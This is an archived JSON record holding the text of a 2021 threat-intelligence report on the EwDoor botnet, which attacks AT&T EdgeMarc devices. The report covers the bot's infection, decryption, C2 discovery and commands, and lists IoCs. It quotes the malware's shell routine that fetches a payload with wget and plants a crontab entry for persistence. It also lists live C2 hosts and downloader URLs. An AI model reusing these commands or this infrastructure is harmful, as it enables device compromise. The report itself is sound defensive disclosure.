{
	"id": "d04f4c5b-1c63-4d3f-8e7d-1841cf88e684",
	"created_at": "2026-04-06T00:14:21.335984Z",
	"updated_at": "2026-04-10T03:21:53.89723Z",
	"deleted_at": null,
	"sha1_hash": "90970a7da47302f944f26454baea0aec5169336d",
	"title": "EwDoor Botnet Is Attacking AT\u0026T Customers",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1663000,
	"plain_text": "EwDoor Botnet Is Attacking AT\u0026T Customers\r\nBy Alex.Turing\r\nPublished: 2021-11-30 · Archived: 2026-04-05 17:36:49 UTC\r\nBackground\r\nOn October 27, 2021, our Botmon system ided an attacker attacking Edgewater Networks' devices via CVE-2017-\r\n6079 with a relatively unique mount file system command in its payload, which had our attention, and after\r\nanalysis, we confirmed that this was a brand new botnet, and based on it's targeting of Edgewater producers and\r\nits Backdoor feature, we named it EwDoor.\r\nThe initial version of EwDoor used a multi-C2 redundancy mechanism, and we registered the second C2\r\ndomain, iunno.se , which gave us the opportunity to measure its size. Unfortunately EwDoor reconfigured its\r\ncommunication model after experiencing problems with the main C2 network failure, using BT tracker to\r\ndownlink C2s, and in turn we lost sight of EwDoor. However, during this brief observation, we confirmed that the\r\nattacked devices were EdgeMarc Enterprise Session Border Controller , belonging to the telecom company\r\nAT\u0026T, and that all 5.7k active victims that we saw durning the short time window were all geographically\r\nlocated in the US.\r\nSo far, the EwDoor in our view has undergone 3 versions of updates, and its main functions can be summarized\r\ninto 2 main categories of DDoS attacks and Backdoor. Based on the attacked devices are telephone\r\ncommunication related, we presume that its main purpose is DDoS attacks, and gathering of sensitive\r\ninformation, such as call logs.\r\nGiven the size, activity of EwDoor, and sensitivity of the infected devices, we decided to write this paper to share\r\nour findings with the community.\r\nTimeline\r\nOctober 27, 2021, first capture of EwDoor, version number 0.12.0, main features are DDoS Attack, File\r\nManager, Reverse Shell, Port Scan, etc.\r\nNovember 8, 2021, EwDoor was updated to version number 0.15.0, moving C2 from local to cloud, using\r\nBT Trackers.\r\nNovember 15, 2021, EwDoor updated to version 0.16.0, minor update, adding sandbox confrontation\r\nfeatures.\r\nNovember 20, 2021, EwDoor was updated version 0.16.0, minor update, adding more BT Trackers.\r\nEwDoor Overview\r\nhttps://blog.netlab.360.com/warning-ewdoor-botnet-is-attacking-att-customers/\r\nPage 1 of 21\n\nWe have captured a total of 3 versions of EwDoor, with version 0.16.0 as a blueprint, we can characterize EwDoor\r\nas, a botnet that sends C2 down through BT tracker, uses TLS to protect traffic, and mainly profits by means of\r\nDDoS attacks and sensitive data theft, which currently propagates through the Nday vulnerability CVE-2017-\r\n6079, mainly targeting EdgeMarc Enterprise Session Border Controller devices.\r\nCurrently supports 6 major functions.\r\nSelf updating\r\nPort scanning\r\nFile management\r\nDDoS attack\r\nReverse SHELL\r\nExecute arbitrary commands\r\nIts basic loigic is shown below.\r\nSize\r\nBy grabbing the author's unregistered CC domain name, we were able to measure the size of this Botnet for a little\r\nwhile, when the active Bot IP was around 5.7k. The AS numbers of the infected device IPs were all\r\nAS7018|AT\u0026T_Services,_Inc. (AT\u0026T, an American telecom company) . By back-checking the SSl certificates\r\nhttps://blog.netlab.360.com/warning-ewdoor-botnet-is-attacking-att-customers/\r\nPage 2 of 21\n\nused by these devices, we found that there were about 100k IPs using the same SSl certificate. We are not sure\r\nhow many devices corresponding to these IPs could be infected, but we can speculate that as they belong to the\r\nsame class of devices the possible impact is real.\r\nShell script analysis\r\nEwDoor's SHELL script is quite long, we extracted the key parts for analysis.\r\nsetup_ramdisk() {\r\n dd if=/dev/zero of=$RAMDISK bs=4096k count=1\r\n gunzip -c $IMAGE \u003e $RAMDISK\r\n mkdir -p $MOUNT\r\n mount $RAMDISK $MOUNT\r\n}\r\ndownload_update() {\r\n killall -9 ewstat\r\n sleep $[ ( $RANDOM % 10 ) + 1 ]\r\n rm -f $IMAGE\r\n rm -f $EW_BIN\r\n wget -O $IMAGE $1\r\n grep \"$EW_BIN\" /etc/config/crontab \u003e/dev/null 2\u003e\u00261\r\n # is it not already in the crontab?\r\n if [ $? != 0 ]; then\r\n echo \"* * * * * root $EW_BIN \u003e/dev/null 2\u003e\u00261 \u0026\" \u003e\u003e /etc/config/crontab\r\n fi\r\n sleep 1\r\n cfg_commit\r\n}\r\nhttps://blog.netlab.360.com/warning-ewdoor-botnet-is-attacking-att-customers/\r\nPage 3 of 21\n\nIt can be seen that the main functions of the SHELL script are\r\nDownload and execute EwDoor samples\r\nSet up Crontab for persistence\r\nIt is also worth mentioning that EwDoor samples are stored in the form of gzip on the download server, which to a\r\ncertain extent escapes the security detection for binary files; the authors of earlier versions made the sample files\r\ninto Linux rev 1.0 ext2 filesystem files and then used mount to mount the files on the system, which is\r\nprobably another trick to protect itself.\r\nSample Analysis\r\nThe latest version of 0.16 was chosen as the main object of analysis, and its basic information is shown below.\r\nMD5:7d4937e27d0fd75dd6159ffe53ebb505\r\nELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), dynamically linked, interpreter /lib/ld-uClibc.so.0, s\r\nPacker:none\r\nVersion: 0.16.0\r\nEwdoor uses dynamic linking, and although it adopts some anti-reverse techniques, there is not much difficulty in\r\nreversing it. In general, the function is relatively simple. When it runs on the infected device, it first collects\r\ndevice information, them performs soem common things such as single instance, persistence and other functions;\r\nthen decrypts the bt tracker and obtains C2 by accessing the bt tracker; finally reports the collected device\r\ninformation to C2 and executes the commands issued by C2.\r\nNow let’s analyze the implementation of EwDoor one by one from 3 aspects: safeguard, host behavior and\r\nnetwork communication.\r\nSafeguards\r\nTLS protocol is used at the network level to prevent communication from being intercepted.\r\nSensitive resources are encrypted to make it more difficult to reverse\r\nC2 has moved from local to \"cloud\" and sent by BT tracker to prevent direct extraction by IOC system.\r\nModify the \"ABIFLAGS\" PHT in ELF to counter qemu-user and some high kernel versions of the linux\r\nsandbox. This is a relatively rare countermeasure, which shows that the author of EwDoor is very familiar\r\nwith the Linux kernel, QEMU, and Edgewater devices.\r\nhttps://blog.netlab.360.com/warning-ewdoor-botnet-is-attacking-att-customers/\r\nPage 4 of 21\n\nThe following error is generated when actually running a simulation with qemu-user.\r\nwrite(2, \"/tmp/echuysqs: Invalid PT_MIPS_ABIFLAGS entry\\n\", 46)\r\nHost behavior\r\nWhen Ewdoor runs, it will check the file name and parameters. When the file name is \"/var/tmp/.mnt/ewupdate\",\r\nit means that this is an update operation, and then it will copy itself to ewstat by the command cp -f\r\n/var/tmp/.mnt/ewupdate /var/tmp/.mnt/ewstat and then start the execution; when there are no start parameters,\r\nor the first start is not script, then the /etc/config/ew.conf script is executed via bash; only when the first boot\r\ndata is script, the processing logic below is executed, which is in a way also a countermeasure to the\r\nsandbox/simulator.\r\nSingle instance\r\nEwdoor implements single instance by means of a file lock, as shown below.\r\nhttps://blog.netlab.360.com/warning-ewdoor-botnet-is-attacking-att-customers/\r\nPage 5 of 21\n\nWe can use /proc/locks to observe the process and corresponding lock files, and then execute the EwDoor, we\r\ncan see that no new processes are created.\r\nhttps://blog.netlab.360.com/warning-ewdoor-botnet-is-attacking-att-customers/\r\nPage 6 of 21\n\nCollecting device information\r\nEwdoor collects the hostname, NIC address, etc. of the compromised device for use later in the registration\r\nprocess.\r\nPersistence\r\nEwdoor periodically terminates the netflash process in the system with the following code. netflash command\r\nis a maintenance command used to update the system remotely. EwDoor achieves persistence by blocking the\r\nmaintenance channel and then working with the crontab in the SHELL script.\r\nhttps://blog.netlab.360.com/warning-ewdoor-botnet-is-attacking-att-customers/\r\nPage 7 of 21\n\nNetwork communication\r\nEwdoor stores the encrypted network related sensitive resources, such as registration information, C2, ports, etc.\r\nin the sample. Therefore, when bots want to communicate with C2, they have to decrypt this part of the resources\r\nfirst, then get the C2 either directly or indirectly, and then finally establish communication with the C2 and wait\r\nfor the execution of the commands issued by the C2.\r\nDecryption\r\nEwdoor uses 3 tables to describe the encrypted resources, one is the ciphertext table, one is the ciphertext length\r\ntable and one is the combination table. The ciphertext \u0026 ciphertext length table are used to describe the encrypted\r\nresource itself, while the combination table is used to describe how the resource is used in combination. The\r\ncipher table and cipher length table can decrypt BT domain, BT port and other information, while the combination\r\ntable can combine BT domain \u0026 port into BT tracker.\r\nEwDoor decrypts sensitive information by using the \"gstr\" function, which is implemented as follows.\r\nhttps://blog.netlab.360.com/warning-ewdoor-botnet-is-attacking-att-customers/\r\nPage 8 of 21\n\nAfter reverse analysis, we wrote the following IDA script, through which we can decrypt all the resource\r\ninformation.\r\n# tested in ida 7.0, only for md5 7d4937e27d0fd75dd6159ffe53ebb505\r\npbuf_base=0x00467014\r\nplen_base=0x00455A14\r\nkey=\"холодно в доме папа в тужурке мама дочуркою топит в печурке!\"\r\ncnt=0\r\nwhile idc.get_wide_dword(plen_base)!=0:\r\n plain=''\r\n blen=idc.get_wide_dword(plen_base)\r\n pbuf=idc.get_wide_dword(pbuf_base)\r\n buf=idc.get_bytes(pbuf,blen)\r\n for i in range(blen):\r\n tmp=chr(ord(buf[i])^cnt ^ ord(key[i % len(key)]))\r\n plain+=tmp\r\n \r\n print plain\r\n plen_base+=4\r\n pbuf_base+=4\r\n cnt+=1\r\n if cnt \u003e=62:\r\n break\r\nThere are 62 items of encrypted resources, and the first 22 items after decryption are as follows.\r\nhttps://blog.netlab.360.com/warning-ewdoor-botnet-is-attacking-att-customers/\r\nPage 9 of 21\n\nindex Item index item\r\n0 OrOib2zCIWa10v2bunJ 11 tracker.birkenwald.de\r\n1 6969 12 ipv6.tracker.zerobytes.xyz\r\n2 53 13 fe.dealclub.de\r\n3 1337 14 wassermann.online\r\n4 80 15 mail.realliferpg.de\r\n5 451 16 movies.zsw.ca\r\n6 2770 17 tracker.blacksparrowmedia.net\r\n7 16661 18 code2chicken.nl\r\n8 2710 19 abufinzio.monocul.us\r\n9 2960 20 tracker.0x.tf\r\n10 3391 21 tracker.altrosky.nl\r\nThe combination table built into the sample is shown below.\r\nThe combination table is grouped by 2 items and combined in order, i.e., table item 11 is combined with table item\r\n1, table item 12 is combined with table item 7, and so on. The combination of [11, 1] and [12, 7] gives the\r\naddresses of 2 BT trackers \"tracker.birkenwald.de :6969\" and \"ipv6.tracker.zerobytes.xyz:16661\" respectively.\r\nGetting C2\r\nEwDoor gets C2 in different ways in different versions. In version 0.12.0, the direct method is used, while in 0.15,\r\n0.16, the indirect method is used.\r\nDirect method\r\nAfter the above decryption process, bots will directly get C2. take sample 5d653e9a5b1093ef8408c3884fbd9217\r\nas an example, through the following IDA script, decrypt all encrypted resources.\r\nhttps://blog.netlab.360.com/warning-ewdoor-botnet-is-attacking-att-customers/\r\nPage 10 of 21\n\n# tested in ida 7.0, only for md5 5d653e9a5b1093ef8408c3884fbd9217\r\npbuf_base=0x00467814\r\nplen_base=0x00456100\r\nkey=\"TheMagicalMysteryTourIsComingToTakeYouAway!\"\r\ncnt=0\r\nwhile idc.get_wide_dword(plen_base)!=0:\r\n plain=''\r\n blen=idc.get_wide_dword(plen_base)\r\n pbuf=idc.get_wide_dword(pbuf_base)\r\n buf=idc.get_bytes(pbuf,blen)\r\n for i in range(blen):\r\n tmp=chr(ord(buf[i])^cnt ^ ord(key[i % len(key)]))\r\n plain+=tmp\r\n \r\n print plain\r\n plen_base+=4\r\n pbuf_base+=4\r\n cnt+=1\r\n if cnt\u003e=18:\r\n break\r\nThe decrypted resources are shown in the following table, table entries 1 to 14 are C2s, table entries 15 to 17 are\r\nports.\r\nIndex Item Index Item\r\n0 F0JEAADWS4kQFj7iPOQyjA 9 rtmxvd.iunno.se\r\n1 185.10.68.20 10 hhqnyy.zapto.org\r\n2 rtmxvd.iunno.se 11 besthatsite.mooo.com\r\n3 ekgmua.zapto.org 12 b.rtmxvdio.ne\r\n4 boatreviews.xpresit.net 13 b.hatbowlu3hf.ru\r\n5 a.rtmxvdio.net 14 b.hatbowlrtx.su\r\n6 a.hatbowlu3hf.ru 15 13433\r\n7 a.hatbowlrtx.su 16 443\r\n8 45.141.157.217 17 53\r\nIndirect method\r\nhttps://blog.netlab.360.com/warning-ewdoor-botnet-is-attacking-att-customers/\r\nPage 11 of 21\n\nThe so-called indirect method, that is, after the above decryption process to get the BT tracker, a specific request\r\nto the BT tracker has to be made to get C2, this process uses two functions \"bt_generate_daily_hash_and_port\"\r\nand \"bt_try_find_good_peers\", the former is used to get the C2 port, the latter is used to get the C2 IP.\r\nThe implementation of the bt_generate_daily_hash_and_port function is shown below, the specific logic is to\r\nformat the current time as \"%d%m%Y\", then splice it with \"1HAT2BWL\", then calculate the SHA1 value of this\r\nstring, and then calculate the last 2 bytes of SHA1 to get the port of C2.\r\nIn fact, the port calculated in the above step is not the real port value, it needs to add 10. The process is shown in\r\nthe figure below.\r\nThe implementation of the bt_try_find_good_peers function is shown below. The specific logic is to send the\r\nabove SHA1 value as infohash to the bt tracker, and get the C2:PORT through the Tracker UDP protocol. If the\r\nPORT is equal to the above port value, then this IP is the IP of C2.\r\nhttps://blog.netlab.360.com/warning-ewdoor-botnet-is-attacking-att-customers/\r\nPage 12 of 21\n\nThe following figure shows the network traffic generated on 2021.11.22 as an example.\r\nThe red part is the SHA1 value of the string \"1HAT2BWL22112021\", the last 2 bytes of which are 0x23a2, and\r\nthe port \"0xc6fc\" of C2 is obtained by the following code operation.\r\nsha18=0x23\r\nsha19=0xa2\r\ndef tohex(val, nbits):\r\n return hex((val + (1 \u003c\u003c nbits)) % (1 \u003c\u003c nbits))\r\nhttps://blog.netlab.360.com/warning-ewdoor-botnet-is-attacking-att-customers/\r\nPage 13 of 21\n\nport=sha19+((sha18\u00260xf)\u003c\u003c8)-15536+10\r\nprint tohex(port,16)\r\nThe SHA1 value calculated above will be sent to BT tracker as infohash, and then compare the server port\r\nreturned by BT tracker, we can see that there are 3 groups of ports are 0xcff6, choose any group to establish\r\ncommunication.\r\n2d 8d 9b d9 : c6fc -\u003e 45.141.155.217:50940\r\n3e 4d 9c 67 : c6fc -\u003e 62.77.156.103:50940\r\nd4 c0 f1 9e : c6fc -\u003e 212.192.241.158:50940\r\nThe actual network connection is as follows:\r\nCommunication with C2\r\nWhen Ewdoor successfully obtains C2, it first establishes a connection through TLS protocol, then sends the\r\nregistration information to C2, and finally waits for the execution of the command sent by C2. In this process,\r\naccording to the different versions, the communication protocols with C2 can be divided into the following two\r\nmajor categories.\r\n0.12 version protocol\r\n0x01: TLS connection\r\nThe TLS connection itself is not worth talking about, but the interesting point is that in version 0.12, the author of\r\nEwDoor made a mistake.\r\nAs shown in the figure below, in version 0.12, Ewdoor decrypted C2 by \"resolving_and_connect_first\" to\r\nestablish a connection with C2. The values of parameters a1,a2 are taken from res_range , which requires\r\na2\u003e=a1 to perform the process of resolving and connecting. Sample 5d653e9a5b1093ef8408c3884fbd9217 has\r\na1=8,a2=7, which creates a bug that causes the C2s numbered 8 to 14 to never be connected, but the Ewdoor\r\nauthors quickly realized the bug and in sample 6c553db88e4cd52a2ed4795ec1710421 and it was fixed.\r\nhttps://blog.netlab.360.com/warning-ewdoor-botnet-is-attacking-att-customers/\r\nPage 14 of 21\n\n0x02: Registration\r\nThe following code constructs the registration packet, which includes the decrypted string from index 0, version\r\nnumber, device host name, device NIC address and other information.\r\nThe actual traffic generated is shown below.\r\n00000000 48 45 4c 4f 20 30 2e 31 32 2e 30 20 46 30 4a 45 |HELO 0.12.0 F0JE|\r\n00000010 41 41 44 57 53 34 6b 51 46 6a 37 69 50 4f 51 79 |AADWS4kQFj7iPOQy|\r\n00000020 6a 41 20 64 65 62 69 61 6e 2d 6d 69 70 73 20 31 |jA debian-mips 1|\r\n00000030 32 33 34 35 36 0a |23456.|\r\n0x03: Supported commands\r\nAfter successful registration with C2, Ewdoor waits for the execution of commands issued by C2. The commands\r\nsupported by version 0.12 are shown in the following table.\r\nhttps://blog.netlab.360.com/warning-ewdoor-botnet-is-attacking-att-customers/\r\nPage 15 of 21\n\ncmd purpose\r\nuf udp flood\r\nsf syn flood\r\ncat exec \"cat\" cmd\r\nping heartbeat\r\nexec run cmd via bash\r\nexec2 run cmd via popen\r\npscan port scan\r\nuname exec \"uname\" cmd\r\nupdate write \"/tmp/.ewupdate\"\r\nreverse reverse shell\r\ndownload download file via wget\r\n0.15\u00260.16 version protocol\r\n0x01: TLS connection\r\nNothing special here.\r\n0x02: Registration\r\nThe following code is used to construct the registration packet. The data includes the decrypted string from index\r\n0, version number, device host name, device NIC address and other information.\r\nThe actual traffic generated is shown below.\r\n00000000 00 3b 00 00 00 00 00 00 00 00 02 00 06 30 2e 31 |.;...........0.1|\r\n00000010 36 2e 30 00 13 4f 72 4f 69 62 32 7a 43 49 57 61 |6.0..OrOib2zCIWa|\r\n00000020 31 30 76 32 62 75 6e 4a 00 0b 64 65 62 69 61 6e |10v2bunJ..debian|\r\n00000030 2d 6d 69 70 73 00 06 31 32 33 34 35 36 |-mips..123456|\r\n0000003d\r\nhttps://blog.netlab.360.com/warning-ewdoor-botnet-is-attacking-att-customers/\r\nPage 16 of 21\n\n0x03: Command signature verification\r\nAfter successfully registration, Ewdoor waits for C2 to issue the instruction, which consists of \" len(2 bytes) +\r\nSignature(512 bytes) + sessionid(8bytes) + cmd \" 4 parts, when receiving the instruction, Ewdoor will verify\r\nthe instruction by proto_verify_signature function. By doing this Ewdoor ensures that the whole network is fully\r\ncontrollable and not stolen by others.\r\nThe pubkey is encrypted and stored in the sample, which is 550 bytes in total, and the real public key can be\r\nobtained after the 0x2a\r\nhttps://blog.netlab.360.com/warning-ewdoor-botnet-is-attacking-att-customers/\r\nPage 17 of 21\n\nTake the payload received in practice as an example, it can be divided into 4 parts according to the format\r\ndescribed above.\r\nThe above payload can be easily verified by the pk_verify tool that comes with mbedtls.\r\n\u003emd5 pubkey\r\n9dba72160f5d02ebdc8a78bcb27defa *pubkey\r\n\u003emd5 msg\r\n5a6d3b1018b5e7543ee6f73d6c9df727 *msg\r\n\u003emd5 msg.sig\r\n10acc6e0e0447d900d6d46c66c8f4406 *msg.sig\r\n\u003ecat msg | hexdump -C\r\n00000000 00 00 00 00 00 00 01 07 01\r\n\u003epk_verify.exe pubkey msg\r\n. Reading public key from 'pubkey'\r\nhttps://blog.netlab.360.com/warning-ewdoor-botnet-is-attacking-att-customers/\r\nPage 18 of 21\n\n. Verifying the SHA-256 signature\r\n. OK (the signature is valid)\r\nWhen the command passes the check, the specific command is just executed, here the command number is 1,\r\nwhich is the heartbeat command.\r\n0x04: Supported commands\r\nThe commands supported by version 0.15, 0.16 are shown in the following table.\r\ncmd index purpose\r\n1 heartbeat\r\n2 port scan\r\n4 exec \"uname\" cmd\r\n5 download file via wget\r\n6 update, write \"/var/tmp/.ewupdate\"\r\n7 run cmd via bash\r\n8 run cmd via popen\r\n9 ddos attack\r\nMiscellaneous\r\nThe author of Ewdoor is a little bit of a bug fixer!\r\nIt took the author only 16 minutes to fix the aforementioned C2 bug in version 0.12.\r\neef0035f971622cc5f48e164ca28a95f; gzip compressed data, was \"ramdisk.img\", from Unix, last modified: Wed\r\nfbbacfb20e487265c7fdb30817717f26; gzip compressed data, was \"ramdisk.img\", from Unix, last modified: Wed\r\nFrom The xor keys to actor profile.\r\nThe first used key \"TheMagicalMysteryTourIsComingToTakeYouAway!\" , is the from The Beatles.\r\nThe second used key \"холодно в доме папа в тужурке мама дочуркою топит в печурке!\"\r\nAccording to google translate, it is \"It’s cold in the house, dad in a jacket, mom drowns her daughter\r\nin the stove!\", kinda creepy!\r\nThe note from the author\r\nAfter finding our honeypot IP in November, he called us out in the paylaod, as can be seen from below.\r\nhttps://blog.netlab.360.com/warning-ewdoor-botnet-is-attacking-att-customers/\r\nPage 19 of 21\n\nReaders are always welcomed to reach us on Twitter or email us to netlab at 360 dot cn.\r\nIoC\r\nC2\r\n185.10.68.20\r\nrtmxvd.iunno.se\r\nekgmua.zapto.org\r\nboatreviews.xpresit.net\r\na.rtmxvdio.net\r\na.hatbowlu3hf.ru\r\na.hatbowlrtx.su\r\n45.141.157.217\r\nrtmxvd.iunno.se\r\nhhqnyy.zapto.org\r\nbesthatsite.mooo.com\r\nb.rtmxvdio.net\r\nb.hatbowlu3hf.ru\r\nb.hatbowlrtx.su\r\nport: 53， 443，13433\r\nDownloader\r\nhttp://185[.10.68.20:1234/ew-new.sh\r\nhttp://185[.10.68.20:1234/ew.sh\r\nhttp://185[.10.68.20:1234/prod/mips\r\nhttp://185[.10.68.20:1234/ramdisk.img.gz\r\nhttp://212[.193.30.209/61501e55/mips\r\nhttp://212[.193.30.209/859b6cfa.sh\r\nSample MD5\r\nhttps://blog.netlab.360.com/warning-ewdoor-botnet-is-attacking-att-customers/\r\nPage 20 of 21\n\n007c28d9a0ccfb10c478689fd63e0de0\r\n128331f1c808ee385375dd54d0609ebc\r\n46c18a8e93a863053952985a39bd7d63\r\n4f0841ac08a27d8b3d56cbd03fb68ad8\r\n5c4390e1668856cc7f72499a72f935d6\r\n62bc8899a353921ac685cabb63de97b3\r\n67ccb3cf1f4f57f5a0ded4d20bc91d73\r\n7d4937e27d0fd75dd6159ffe53ebb505\r\n84b3df62ed45bea57d0dd85e80f0dc07\r\n8794d23cad330de803294a2a1adb128b\r\nabaed830fe09e92ee434236d3db01e08\r\nb81ade4f18c2df58adef301f401e8a02\r\nca6eb890853434ab9a0f8cdbab0965ea\r\nddf96434bdb7b449ddcc925e6a5b3095\r\neef0035f971622cc5f48e164ca28a95f\r\nfbbacfb20e487265c7fdb30817717f26\r\nSource: https://blog.netlab.360.com/warning-ewdoor-botnet-is-attacking-att-customers/\r\nhttps://blog.netlab.360.com/warning-ewdoor-botnet-is-attacking-att-customers/\r\nPage 21 of 21\n\nestablish a connection a2\u003e=a1 to perform with C2. the process The values of of resolving and parameters a1,a2 connecting. are taken Sample 5d653e9a5b1093ef8408c3884fbd9217 from res_range , which requires has\na1=8,a2=7, which creates a bug that causes the C2s numbered 8 to 14 to never be connected, but the Ewdoor\nauthors quickly realized the bug and in sample 6c553db88e4cd52a2ed4795ec1710421  and it was fixed.\n   Page 14 of 21",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.netlab.360.com/warning-ewdoor-botnet-is-attacking-att-customers/"
	],
	"report_names": [
		"warning-ewdoor-botnet-is-attacking-att-customers"
	],
	"threat_actors": [],
	"ts_created_at": 1775434461,
	"ts_updated_at": 1775791313,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/90970a7da47302f944f26454baea0aec5169336d.pdf",
		"text": "https://archive.orkl.eu/90970a7da47302f944f26454baea0aec5169336d.txt",
		"img": "https://archive.orkl.eu/90970a7da47302f944f26454baea0aec5169336d.jpg"
	}
}